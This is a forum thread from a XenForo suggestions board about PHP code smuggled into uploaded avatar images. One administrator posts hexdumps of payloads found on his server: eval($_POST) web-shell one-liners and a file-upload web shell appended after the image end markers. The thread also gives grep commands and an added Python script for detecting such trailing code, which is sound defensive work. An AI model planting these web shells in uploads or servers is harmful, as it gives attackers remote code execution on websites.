
Lack of Interest Uploaded Image Security

Discussion in 'Closed Suggestions' started by |Jordan|, Mar 23, 2013.

  1. |Jordan|

    |Jordan| Active Member

    Uploaded images (either from attachments or avatars) should be secured (to prevent this exploit). It would also be great if uploaded avatars that are animated could be allowed to animate.
     
  2. Chris D

    Chris D XenForo Developer Staff Member

    On the first one, this has been dealt with in XenForo 1.1.4 which is due for release shortly. I actually have an image that has PHP code embedded into it.

    When I try to upload it:

    XenForo Community - Error
    The uploaded image contains invalid content. Please upload a different image.

    In terms of the latter error, this is a server configuration issue. Resizing animated images requires the ImageMagick library to be installed in the server, and to be enabled in the Admin CP.
     
  3. Mike

    Mike XenForo Developer Staff Member

    The first one is sort of unrelated to your server config issue, Chris. It's about a stupid upload script. :)
     
    Chris D likes this.
  4. Kent

    Kent Active Member

    GD doesn't support animation, but ImageMagick does.


    Out of curiosity I scanned my avatar directory and found 4 avatars with PHP in them, but no sign of a successful exploit.

    Code:
    000002b0  ff d9 3c 3f 70 68 70 20  40 65 76 61 6c 28 24 5f  |..<?php @eval($_|
    000002c0  50 4f 53 54 5b 27 39 27  5d 29 3b 3f 3e 1a        |POST['9']);?>.|
    Code:
    000037e0  ff d9 3c 3f 70 68 70 20  70 68 70 69 6e 66 6f 28  |..<?php phpinfo(|
    000037f0  29 3b 3f 3e                                       |);?>|
    Code:
    000005e0  00 00 00 49 45 4e 44 ae  42 60 82 3c 3f 70 68 70  |...IEND.B`.<?php|
    000005f0  20 65 63 68 6f 20 27 3c  62 3e 3c 62 72 3e 3c 63  | echo '<b><br><c|
    00000600  65 6e 74 65 72 3e 3c 66  6f 6e 74 20 63 6f 6c 6f  |enter><font colo|
    00000610  72 3a 22 62 6c 75 65 22  3e 3c 73 70 61 6e 20 73  |r:"blue"><span s|
    00000620  74 79 6c 65 3d 22 66 6f  6e 74 2d 66 61 6d 69 6c  |tyle="font-famil|
    00000630  79 3a 20 6d 6f 6e 6f 73  70 61 63 65 3b 22 3e 3c  |y: monospace;"><|
    00000640  73 70 61 6e 20 73 74 79  6c 65 3d 22 63 6f 6c 6f  |span style="colo|
    00000650  72 3a 20 72 67 62 28 32  35 35 2c 20 32 35 35 2c  |r: rgb(255, 255,|
    00000660  20 32 35 35 29 3b 22 3e  6f 3c 2f 73 70 61 6e 3e  | 255);">o</span>|
    00000670  3c 62 72 3e 3c 62 72 3e  27 2e 70 68 70 5f 75 6e  |<br><br>'.php_un|
    00000680  61 6d 65 28 29 2e 27 3c  62 72 3e 3c 2f 62 3e 27  |ame().'<br></b>'|
    00000690  3b 20 65 63 68 6f 20 27  3c 66 6f 72 6d 20 61 63  |; echo '<form ac|
    000006a0  74 69 6f 6e 3d 22 22 20  6d 65 74 68 6f 64 3d 22  |tion="" method="|
    000006b0  70 6f 73 74 22 20 65 6e  63 74 79 70 65 3d 22 6d  |post" enctype="m|
    000006c0  75 6c 74 69 70 61 72 74  2f 66 6f 72 6d 2d 64 61  |ultipart/form-da|
    000006d0  74 61 22 20 6e 61 6d 65  3d 22 75 70 6c 6f 61 64  |ta" name="upload|
    000006e0  65 72 22 20 69 64 3d 22  75 70 6c 6f 61 64 65 72  |er" id="uploader|
    000006f0  22 3e 27 3b 20 65 63 68  6f 20 27 3c 69 6e 70 75  |">'; echo '<inpu|
    00000700  74 20 74 79 70 65 3d 22  66 69 6c 65 22 20 6e 61  |t type="file" na|
    00000710  6d 65 3d 22 66 69 6c 65  22 20 73 69 7a 65 3d 22  |me="file" size="|
    00000720  35 30 22 3e 3c 69 6e 70  75 74 20 6e 61 6d 65 3d  |50"><input name=|
    00000730  22 5f 75 70 6c 22 20 74  79 70 65 3d 22 73 75 62  |"_upl" type="sub|
    00000740  6d 69 74 22 20 69 64 3d  22 5f 75 70 6c 22 20 76  |mit" id="_upl" v|
    00000750  61 6c 75 65 3d 22 55 70  6c 6f 61 64 22 3e 3c 2f  |alue="Upload"></|
    00000760  66 6f 72 6d 3e 27 3b 20  69 66 28 20 24 5f 50 4f  |form>'; if( $_PO|
    00000770  53 54 5b 27 5f 75 70 6c  27 5d 20 3d 3d 20 22 55  |ST['_upl'] == "U|
    00000780  70 6c 6f 61 64 22 20 29  20 7b 20 69 66 28 40 63  |pload" ) { if(@c|
    00000790  6f 70 79 28 24 5f 46 49  4c 45 53 5b 27 66 69 6c  |opy($_FILES['fil|
    000007a0  65 27 5d 5b 27 74 6d 70  5f 6e 61 6d 65 27 5d 2c  |e']['tmp_name'],|
    000007b0  20 24 5f 46 49 4c 45 53  5b 27 66 69 6c 65 27 5d  | $_FILES['file']|
    000007c0  5b 27 6e 61 6d 65 27 5d  29 29 20 7b 20 65 63 68  |['name'])) { ech|
    000007d0  6f 20 27 3c 62 3e 53 75  63 63 65 73 73 3c 2f 62  |o '<b>Success</b|
    000007e0  3e 3c 62 72 3e 3c 62 72  3e 27 3b 20 7d 20 65 6c  |><br><br>'; } el|
    000007f0  73 65 20 7b 20 65 63 68  6f 20 27 3c 62 3e 6e 3c  |se { echo '<b>n<|
    00000800  2f 62 3e 3c 62 72 3e 3c  62 72 3e 3c 2f 66 6f 6e  |/b><br><br></fon|
    00000810  74 3e 27 3b 20 7d 20 7d  20 3f 3e 3c 3f 70 68 70  |t>'; } } ?><?php|
    00000820  20 65 63 68 6f 20 70 68  70 69 6e 66 6f 28 29 3b  | echo phpinfo();|
    Code:
    000002c0  8a 28 a0 0f ff d9 3c 3f  70 68 70 20 40 65 76 61  |.(....<?php @eva|
    000002d0  6c 28 24 5f 50 4f 53 54  5b 27 39 27 5d 29 3b 3f  |l($_POST['9']);?|
    000002e0  3e 1a                                             |>.|
     
  5. Ingenious

    Ingenious Well-Known Member

    Kent, what do you use to scan your images like this, and is it something all admins should be doing from time to time? Or can we safely assume any PHP within image files is not a threat?
     
  6. Kent

    Kent Active Member

    Incorrect configuration would allow someone to execute those files as PHP, common with Nginx.
    You probably won't have to worry about it.

    To scan, I used grep:
    grep -r '<?php' data/avatars/ >> baddies.txt
    grep -r '<?php' data/attachments/ >> baddies.txt

    And then hexdump to find the code:
    cat data/avatars/l/1/1000.jpg | hd
     
    Ingenious likes this.
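
Added example, not part of any post in this thread: a Python check that goes a step past the grep above by reporting how many bytes follow the image's real end marker (JPEG EOI `ff d9`, PNG `IEND`), which is where the PHP sits in the dumps Kent posted. The function names and the sample bytes are constructed for illustration.

```python
import struct

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_end(data):
    """Offset just past the IEND chunk, or None if the chunk walk fails."""
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length                      # length + type + data + CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None

def jpeg_end(data):
    """Offset just past EOI; walks segments so ff d9 in an EXIF thumbnail is skipped."""
    pos = 2                                     # skip SOI (ff d8)
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:
            return pos + 2
        if marker in (0x01, 0xFF) or 0xD0 <= marker <= 0xD7:
            pos += 1 if marker == 0xFF else 2   # fill byte / standalone marker
            continue
        if pos + 4 > len(data):
            return None
        pos += 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]
        while marker == 0xDA and pos + 1 < len(data):   # entropy-coded scan data
            nxt = data[pos + 1]
            if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                break                           # a real marker, not ff 00 or RSTn
            pos += 1
    return None

def inspect_image(data):
    """Return (bytes after the end marker, or None if unparsable; '<?php' offsets)."""
    end = (png_end(data) if data.startswith(PNG_SIG)
           else jpeg_end(data) if data.startswith(b"\xff\xd8") else None)
    low, hits, i = data.lower(), [], -1
    while (i := low.find(b"<?php", i + 1)) != -1:
        hits.append(i)
    return (None if end is None else len(data) - end), hits

# Constructed sample: JPEG skeleton (not a decodable picture) with a thumbnail-style
# ff d9 inside APP1, a stuffed ff 00 in the scan, and an inert PHP comment after EOI.
TRAILER = b"<?php /* constructed */ ?>"
SAMPLE_JPEG = (b"\xff\xd8\xff\xe1\x00\x0cExif\x00\x00\xff\xd8\xff\xd9"
               b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00\x12\xff\x00\x34\xff\xd9" + TRAILER)
```

Run `inspect_image` over each file under `data/avatars/` and `data/attachments/`; trailing bytes alone are not proof of tampering, since some cameras and editors append their own data after the end marker.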
  7. |Jordan|

    |Jordan| Active Member

    So will there be a fix to prevent this type of exploit?

    What about Abyss Web Server? (it's like IIS but more secure)
     
